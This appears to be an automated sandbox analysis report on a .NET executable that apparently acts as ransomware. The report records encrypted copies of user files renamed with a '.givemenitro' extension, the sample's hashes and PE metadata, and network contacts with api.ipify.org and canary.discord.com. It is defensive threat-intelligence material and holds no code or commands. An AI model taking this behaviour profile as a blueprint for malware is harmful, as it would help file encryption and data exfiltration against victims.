                                              SHA1:06F601AF048F61C5C7CDD65916FD2781793FECC2
                                              SHA-256:E74C409B67572FBF94014C5ACBA83A4A9402454E366B8DABE670AD5E1B09EE9B
                                              SHA-512:57CDE2AEF64FE4E37EF504289E6F546B2F0B4D013D1932BECCAFECCCEA63C832EA67A12F974CEFDA93006A55237BC6BDFAC487A32C1BF3E7E849FA0CCBA0D41B
                                              Malicious:false
                                              Preview:4Z.1-...B...UV3.-.O-..g..j1aMU......&.K.HQ.T6..D..t].e}./..|./3E_......Q..z..._{(.4.. ..uBtg-$..p.......w......Pu.G<.5(.@..._...',...j]xM.[........9!h..A....f..oS...b........4...g...xIT...1..DUH.Z..VV....9!...>.TYAj..d.`j6....'.)..y.(.x...=...EA&Y.}.2gWM...zs..,3.....@...F.....V4..B.>.n..#....... m.bx.../x..-.... .31\~I ..z.e.`..H'.r......Y......A..+.w!i..$...z.D..W].b)>..A6.|g5..q..%..O!.[............].M.X..a.r....$l|....;h.....*Qxd.P.?...[.U.[V.?.2C.`.x...A.....b8.K.AA.z...YH.}......8l.U.....;...t9..jo...C.4k>.%

                                              C:\Users\user\Pictures\Camera Roll\desktop.ini.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):224
                                              Entropy (8bit):7.076044486664172
                                              Encrypted:false
                                              SSDEEP:3:wBQfTdPfXesMfapqS3X0X6RS2Fzicu9QbGJqFZoWwvk44/tfVeKXyrct3lKil7AN:wB853eso0u6DFuH9SMqFCWwb4VfteilC
                                              MD5:4FA28B2913804CFB19F0DAAB6F51A93A
                                              SHA1:A9AC6C4B6B0AFD182946A240A7B88F58FD922FFF
                                              SHA-256:B13B6EA71B833F4AFBD97BF585EE8FDFC81634CE6DEBE722275E0EE77C351E8B
                                              SHA-512:3E987B63BEC36A54D7BF37411111DE50E792A7EF32E67E78F7CDB1D04CE4A933DC638155B40A723CD158F43E7CB2B285598533FF85623BBBEEAB2296D6A2A792
                                              Malicious:false
                                              Preview:.....H........c....>.........(i.....t.&..?.>`+.U..w..Q.+0......+.....cdJ..~~.I<..Pk}G.Y29......?.*.w..=.....9..fy.....DaY..g.UC.....4.. $..:.^8d.t..;.{.Q...BU.p".N.IN.O.*}$3+....Y6.OJ.N.Z.*.....|\.r[F^.........g

                                              C:\Users\user\Pictures\desktop.ini.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):544
                                              Entropy (8bit):7.602035386002605
                                              Encrypted:false
                                              SSDEEP:12:n6OsdziobjDgtTgAQ/guPw6GLnQokkxNXvI778wUA6C:n6QoHDXaf6GLnM0+78w2C
                                              MD5:F6D37136A4EBA64C55A4E087F3150586
                                              SHA1:BCE418AA58D5019B1938B7FE3C4717F9F5988388
                                              SHA-256:AB4FD61EC14037752B7C034F666ACD13481089B75628863599B0234502F6481F
                                              SHA-512:D7831750B268EE0BF46E43C6CD06F0D8624C3F0C4B4C53138682D5BD82FCFEF70546A52CF61FBB5C8245B61F9692A575B5EA2658D6C3E1235949DC7F17C1043E
                                              Malicious:false
                                              Preview:.4.a....P..'.0P......}..3......5.....\on.......G).*.D......&.I...^.H. .%....B..4.....l>...Ha.H._..,B.%..G....RKVK.b..w`.......*}.%...w..4g.X....+...E..v|8`..Dk..Q.P.*..=o.!........{<....Cj.....s......w.8G...J<...g....6..h.....g.%.2.n4..J2.(T...V@uJ.v3U.B..7x......o....U.TE$..n......\{..#.y.7.uL...u...1.gg7a...J...]...n..^.PD-]j6z.......>TQ..x*F4.!.(.Z.#.../...S.Y..G...^.[.xR.......O.?.\.........2..|.C.$........g,......U1....]...~pg..'.n#.E...t...d.....e.#L^.I.E..f.........2t4...t..x.H.T.z..c.U.E..3G.wd$.....P..E

                                              C:\Users\user\Videos\desktop.ini.givemenitro

                                              Download File
                                              Process:C:\Users\user\Desktop\12057ad2.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):544
                                              Entropy (8bit):7.570843099837511
                                              Encrypted:false
                                              SSDEEP:12:9IAVEpHxJ3k+frD5Pu41RaL78TvyX9ozEXU8TaMZG:y1Jdf5jsnFX9ozENaMZG
                                              MD5:E3479A70F29E4B84AA8C38F1F4C5B5A8
                                              SHA1:359D2BB14666CE655BDC06B868A780E076724FA6
                                              SHA-256:D19A39362B3481D0D7DF8B2AAC13F21D2AE81F170989E8FA7A6EC8F22F7559C8
                                              SHA-512:EC39ED75278616026607E1BD4961C3C74866DCC0A10E91DB32ADCABDF26D0ACFA7B95035247ED63121089C3643CEF209B9D7CA97FA1582E4D0F1CEF717F8F354
                                              Malicious:false
                                              Preview:...\.m .*.&.u...S\.Yh.j.QK:...v.o.-...2...;OX(..{t.i._+$e.H&<.a.....RXHNx..>..<.a..i.-.6........`.0..NW..A..n...\.9....=6. .....{.T.I:w...L....-.....K~FS.[.48%(...:.(..+.....O...kWx.3.<d....o*....2.m.....q...}..9Z......{..1.).....%..(...~.j...iW....>uk..&........^.vN.j*cfYa.....J....hv~..$e-u>~.C....w.RAy.S .<W.z..E9?9.. .a..p...=mcq.n..B$.x.M.T.Pa....;;O..d.....|...o|..0.'.o.....w.h1Jy|.k...:<..P.df.#...}.....t=....$..i.hC.k..=.5D.(/..wR;....Q..q....N!h%)...v...._.1.h.Q..x..~;.h...{.....i./F.....A.2...J..]P.

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):5.358315076253311
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:12057ad2.exe
                                              File size:62976
                                              MD5:716bf12f1b7b6b04f1acf6f8ae1eb4bb
                                              SHA1:c172a657fd1a8759beccff5b144f1cb20033008a
                                              SHA256:9e801ce8af98b3c03423f3f9b3d9b2f36aad15a63f21523210a9517f12057ad2
                                              SHA512:0c9db0f2cb081e4d44095be6d71c2aa9967b45af9ba6676ccf8775b918c53c4bbd291315f3970ee71428cea0bc694f2b5f87fd6ba883bc401767fb094354db7d
                                              SSDEEP:768:sKsMqCXfVcWOWM9ZkiANIUcmsYLDwUzc80gmq3oP/oDj:sKsebM9ZkiAPcYr/0O8/on
                                              TLSH:9953542852738A2DC47C82B815FB2F7C27B0AF566460C75D4A78D2AC3F277B68D10B56
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{"..........."...0.................. ... ....@.. .......................`............`................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x410bbe
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xEB227BDA [Mon Jan 3 15:08:10 2095 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x10b690x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x5dc.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x10abc0x38.text
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000xebc40xec00False0.4072927701271186data5.421045147068128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x120000x5dc0x600False0.4205729166666667data4.14746742020054IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x140000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0x120900x34cdata
                                              RT_MANIFEST0x123ec0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 25, 2022 06:46:26.740273952 CEST49699443192.168.2.454.91.59.199
                                              Sep 25, 2022 06:46:26.740312099 CEST4434969954.91.59.199192.168.2.4
                                              Sep 25, 2022 06:46:26.740426064 CEST49699443192.168.2.454.91.59.199
                                              Sep 25, 2022 06:46:26.808121920 CEST49699443192.168.2.454.91.59.199
                                              Sep 25, 2022 06:46:26.808173895 CEST4434969954.91.59.199192.168.2.4
                                              Sep 25, 2022 06:46:27.104156971 CEST4434969954.91.59.199192.168.2.4
                                              Sep 25, 2022 06:46:27.104299068 CEST49699443192.168.2.454.91.59.199
                                              Sep 25, 2022 06:46:27.126401901 CEST49699443192.168.2.454.91.59.199
                                              Sep 25, 2022 06:46:27.126431942 CEST4434969954.91.59.199192.168.2.4
                                              Sep 25, 2022 06:46:27.127051115 CEST4434969954.91.59.199192.168.2.4
                                              Sep 25, 2022 06:46:27.177303076 CEST49699443192.168.2.454.91.59.199
                                              Sep 25, 2022 06:46:27.536014080 CEST49699443192.168.2.454.91.59.199
                                              Sep 25, 2022 06:46:27.579371929 CEST4434969954.91.59.199192.168.2.4
                                              Sep 25, 2022 06:46:27.677349091 CEST4434969954.91.59.199192.168.2.4
                                              Sep 25, 2022 06:46:27.677481890 CEST4434969954.91.59.199192.168.2.4
                                              Sep 25, 2022 06:46:27.677602053 CEST49699443192.168.2.454.91.59.199
                                              Sep 25, 2022 06:46:27.682136059 CEST49699443192.168.2.454.91.59.199
                                              Sep 25, 2022 06:46:27.764818907 CEST49700443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:27.764863968 CEST44349700162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:27.764942884 CEST49700443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:27.765541077 CEST49700443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:27.765558958 CEST44349700162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:27.815896988 CEST44349700162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:27.816054106 CEST49700443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:27.820883036 CEST49700443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:27.820903063 CEST44349700162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:27.821208954 CEST44349700162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:27.823720932 CEST49700443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:27.841882944 CEST44349700162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:27.843080044 CEST49700443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:27.883369923 CEST44349700162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:28.030194044 CEST44349700162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:28.030320883 CEST44349700162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:28.030373096 CEST49700443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:28.040501118 CEST49700443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:28.094274998 CEST49701443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:28.094310999 CEST44349701162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:28.094501972 CEST49701443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:28.095400095 CEST49701443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:28.095412970 CEST44349701162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:28.135298014 CEST44349701162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:28.142936945 CEST49701443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:28.168865919 CEST44349701162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:28.171834946 CEST49701443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:28.219379902 CEST44349701162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:28.355575085 CEST44349701162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:28.355654001 CEST44349701162.159.138.232192.168.2.4
                                              Sep 25, 2022 06:46:28.355724096 CEST49701443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:28.357534885 CEST49701443192.168.2.4162.159.138.232
                                              Sep 25, 2022 06:46:28.439064980 CEST49702443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:46:28.439100027 CEST44349702162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:46:28.439214945 CEST49702443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:46:28.440165043 CEST49702443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:46:28.440182924 CEST44349702162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:46:28.479098082 CEST44349702162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:46:28.481683969 CEST49702443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:46:28.513686895 CEST44349702162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:46:28.514225960 CEST49702443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:46:28.555385113 CEST44349702162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:46:28.715845108 CEST44349702162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:46:28.755492926 CEST49702443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:46:28.755512953 CEST44349702162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:46:28.760358095 CEST49702443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:46:28.760627031 CEST44349702162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:46:28.760672092 CEST44349702162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:46:28.760723114 CEST49702443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:46:28.760745049 CEST49702443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:46:28.847827911 CEST49703443192.168.2.4162.159.136.232
                                              Sep 25, 2022 06:46:28.847882986 CEST44349703162.159.136.232192.168.2.4
                                              Sep 25, 2022 06:46:28.848066092 CEST49703443192.168.2.4162.159.136.232
                                              Sep 25, 2022 06:46:28.848613977 CEST49703443192.168.2.4162.159.136.232
                                              Sep 25, 2022 06:46:28.848628044 CEST44349703162.159.136.232192.168.2.4
                                              Sep 25, 2022 06:46:28.887061119 CEST44349703162.159.136.232192.168.2.4
                                              Sep 25, 2022 06:46:28.890903950 CEST49703443192.168.2.4162.159.136.232
                                              Sep 25, 2022 06:46:28.921552896 CEST44349703162.159.136.232192.168.2.4
                                              Sep 25, 2022 06:46:28.923003912 CEST49703443192.168.2.4162.159.136.232
                                              Sep 25, 2022 06:46:28.963368893 CEST44349703162.159.136.232192.168.2.4
                                              Sep 25, 2022 06:46:29.144817114 CEST44349703162.159.136.232192.168.2.4
                                              Sep 25, 2022 06:46:29.144951105 CEST44349703162.159.136.232192.168.2.4
                                              Sep 25, 2022 06:46:29.145104885 CEST49703443192.168.2.4162.159.136.232
                                              Sep 25, 2022 06:46:29.146419048 CEST49703443192.168.2.4162.159.136.232
                                              Sep 25, 2022 06:48:27.301667929 CEST49704443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:48:27.301717043 CEST44349704162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:48:27.301867008 CEST49704443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:48:27.302927971 CEST49704443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:48:27.302963972 CEST44349704162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:48:27.343424082 CEST44349704162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:48:27.347203970 CEST49704443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:48:27.347233057 CEST44349704162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:48:27.378135920 CEST44349704162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:48:27.378690958 CEST49704443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:48:27.419379950 CEST44349704162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:48:27.582501888 CEST44349704162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:48:27.582927942 CEST44349704162.159.137.232192.168.2.4
                                              Sep 25, 2022 06:48:27.585274935 CEST49704443192.168.2.4162.159.137.232
                                              Sep 25, 2022 06:48:27.585505962 CEST49704443192.168.2.4162.159.137.232

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Sep 25, 2022 06:46:26.648509979 CEST5091153192.168.2.48.8.8.8
                                              Sep 25, 2022 06:46:26.667862892 CEST53509118.8.8.8192.168.2.4
                                              Sep 25, 2022 06:46:26.695760965 CEST5968353192.168.2.48.8.8.8
                                              Sep 25, 2022 06:46:26.715037107 CEST53596838.8.8.8192.168.2.4
                                              Sep 25, 2022 06:46:27.734404087 CEST6416753192.168.2.48.8.8.8
                                              Sep 25, 2022 06:46:27.756652117 CEST53641678.8.8.8192.168.2.4
                                              Sep 25, 2022 06:46:28.072797060 CEST5856553192.168.2.48.8.8.8
                                              Sep 25, 2022 06:46:28.092818022 CEST53585658.8.8.8192.168.2.4
                                              Sep 25, 2022 06:46:28.398125887 CEST5223953192.168.2.48.8.8.8
                                              Sep 25, 2022 06:46:28.420340061 CEST53522398.8.8.8192.168.2.4
                                              Sep 25, 2022 06:46:28.809137106 CEST5680753192.168.2.48.8.8.8
                                              Sep 25, 2022 06:46:28.844862938 CEST53568078.8.8.8192.168.2.4
                                              Sep 25, 2022 06:48:27.279858112 CEST6100753192.168.2.48.8.8.8
                                              Sep 25, 2022 06:48:27.299993992 CEST53610078.8.8.8192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Sep 25, 2022 06:46:26.648509979 CEST192.168.2.48.8.8.80x1ceStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:26.695760965 CEST192.168.2.48.8.8.80xc51aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:27.734404087 CEST192.168.2.48.8.8.80xbfceStandard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.072797060 CEST192.168.2.48.8.8.80xa295Standard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.398125887 CEST192.168.2.48.8.8.80x6535Standard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.809137106 CEST192.168.2.48.8.8.80x5d3dStandard query (0)canary.discord.comA (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:48:27.279858112 CEST192.168.2.48.8.8.80x2eafStandard query (0)canary.discord.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Sep 25, 2022 06:46:26.667862892 CEST8.8.8.8192.168.2.40x1ceNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2022 06:46:26.667862892 CEST8.8.8.8192.168.2.40x1ceNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:26.667862892 CEST8.8.8.8192.168.2.40x1ceNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:26.667862892 CEST8.8.8.8192.168.2.40x1ceNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:26.667862892 CEST8.8.8.8192.168.2.40x1ceNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:26.715037107 CEST8.8.8.8192.168.2.40xc51aNo error (0)api.ipify.orgapi.ipify.org.herokudns.comCNAME (Canonical name)IN (0x0001)false
                                              Sep 25, 2022 06:46:26.715037107 CEST8.8.8.8192.168.2.40xc51aNo error (0)api.ipify.org.herokudns.com3.220.57.224A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:26.715037107 CEST8.8.8.8192.168.2.40xc51aNo error (0)api.ipify.org.herokudns.com54.91.59.199A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:26.715037107 CEST8.8.8.8192.168.2.40xc51aNo error (0)api.ipify.org.herokudns.com3.232.242.170A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:26.715037107 CEST8.8.8.8192.168.2.40xc51aNo error (0)api.ipify.org.herokudns.com52.20.78.240A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:27.756652117 CEST8.8.8.8192.168.2.40xbfceNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:27.756652117 CEST8.8.8.8192.168.2.40xbfceNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:27.756652117 CEST8.8.8.8192.168.2.40xbfceNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:27.756652117 CEST8.8.8.8192.168.2.40xbfceNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:27.756652117 CEST8.8.8.8192.168.2.40xbfceNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.092818022 CEST8.8.8.8192.168.2.40xa295No error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.092818022 CEST8.8.8.8192.168.2.40xa295No error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.092818022 CEST8.8.8.8192.168.2.40xa295No error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.092818022 CEST8.8.8.8192.168.2.40xa295No error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.092818022 CEST8.8.8.8192.168.2.40xa295No error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.420340061 CEST8.8.8.8192.168.2.40x6535No error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.420340061 CEST8.8.8.8192.168.2.40x6535No error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.420340061 CEST8.8.8.8192.168.2.40x6535No error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.420340061 CEST8.8.8.8192.168.2.40x6535No error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.420340061 CEST8.8.8.8192.168.2.40x6535No error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.844862938 CEST8.8.8.8192.168.2.40x5d3dNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.844862938 CEST8.8.8.8192.168.2.40x5d3dNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.844862938 CEST8.8.8.8192.168.2.40x5d3dNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.844862938 CEST8.8.8.8192.168.2.40x5d3dNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:46:28.844862938 CEST8.8.8.8192.168.2.40x5d3dNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:48:27.299993992 CEST8.8.8.8192.168.2.40x2eafNo error (0)canary.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:48:27.299993992 CEST8.8.8.8192.168.2.40x2eafNo error (0)canary.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:48:27.299993992 CEST8.8.8.8192.168.2.40x2eafNo error (0)canary.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:48:27.299993992 CEST8.8.8.8192.168.2.40x2eafNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:48:27.299993992 CEST8.8.8.8192.168.2.40x2eafNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • api.ipify.org
                                              • canary.discord.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.44969954.91.59.199443C:\Users\user\Desktop\12057ad2.exe
                                              TimestampkBytes transferredDirectionData
